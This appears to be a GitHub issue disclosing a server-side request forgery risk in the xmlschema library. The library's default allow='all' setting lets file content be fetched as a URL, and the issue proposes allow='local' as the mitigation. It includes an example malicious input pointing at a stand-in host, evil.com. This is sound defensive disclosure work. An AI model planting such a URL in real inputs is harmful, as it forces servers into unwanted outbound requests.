
XMLResource allow='all' default can lead to SSRF #464

@ngearhart


Today, the source of an XMLResource object can be a remote URL, a local URL, a file path, or a string literal. When loaded, XMLResource tries to interpret the given source first as a URL, then as a Path (local file), then as a string literal*.
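To make the ambiguity concrete, here is a toy sketch of that "URL, then path, then literal" order. It is not xmlschema's actual code: the function name `classify_source`, the `REMOTE_SCHEMES` set, and the exact checks are assumptions made purely for illustration.

```python
import os
from urllib.parse import urlsplit

# Assumed set of schemes that count as "remote" in this toy model.
REMOTE_SCHEMES = {"http", "https", "ftp"}


def classify_source(source: str) -> str:
    """Toy classifier returning 'remote-url', 'local-path', or 'literal'."""
    text = source.strip()

    # 1. A single token with a remote scheme and a host is treated as a URL.
    if text and not any(ch.isspace() for ch in text):
        try:
            parts = urlsplit(text)
        except ValueError:
            parts = None
        if parts is not None and parts.scheme.lower() in REMOTE_SCHEMES and parts.netloc:
            return "remote-url"

    # 2. Text that does not start like XML and names an existing file is a path.
    if text and not text.startswith("<"):
        try:
            if os.path.isfile(text):
                return "local-path"
        except (OSError, ValueError):
            pass

    # 3. Everything else is treated as literal XML text.
    return "literal"
```

Under these assumptions, a string read from a file is only treated as XML text if it fails the first two checks, so the content of the file decides which branch is taken.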

The new-user documentation on "Create a schema instance" does not mention this behavior except for the section "Creating a local copy of a remote XSD schema for offline use." The "Validation" documentation is similar.

A user may, roughly following the documentation, write the following:

import xmlschema

with open('local.xsd', 'r') as infile:
    data = infile.read()
# data is a str, so it may be interpreted as a URL, a path, or XML text
xmlschema.XMLSchema(data)

If local.xsd is indeed an XSD file, we have no problem. However, imagine local.xsd comes from an untrusted location. If a malicious actor could set the content of local.xsd to:

http://evil.com/myfavoritepayload

Then calling xmlschema.XMLSchema() will make an HTTP GET request to that URL. This is Server-Side Request Forgery (SSRF).

This can be mitigated by using the allow setting:

import xmlschema

with open('local.xsd', 'r') as infile:
    data = infile.read()
resource = xmlschema.XMLResource(
    source=data,
    allow='local',
)
xmlschema.XMLSchema(resource)

However, the default is allow='all', so a caller who does not know about this setting gets no protection.
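Independently of the allow setting, a caller could also reject untrusted content that does not look like XML before handing it to the library. The following is a minimal sketch of such a guard; `require_xml_text` is a hypothetical helper, not part of xmlschema, and the "starts with `<`" test is an assumption about what counts as XML text.

```python
def require_xml_text(text: str) -> str:
    """Hypothetical guard: return text unchanged if it starts like XML, else raise."""
    # Skip an optional byte order mark and leading whitespace before the check.
    head = text.lstrip("\ufeff \t\r\n")
    if not head.startswith("<"):
        raise ValueError("schema source does not look like XML text")
    return text
```

With this in place, the earlier example would call xmlschema.XMLSchema(require_xml_text(data)). This only stops a bare URL or path from being passed in as the source. It does nothing about remote locations referenced from inside an otherwise valid schema, so it is a complement to allow='local' rather than a replacement.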

Would you consider changing the default to allow='local' and releasing a new major version? I understand this would be a breaking change for end users, but I believe the pain of upgrading to a new major version is worth mitigating the risk of this default.

*Technically there is additional complexity with bytes-like and StringIO-like objects but that is not relevant for this discussion.

Labels: enhancement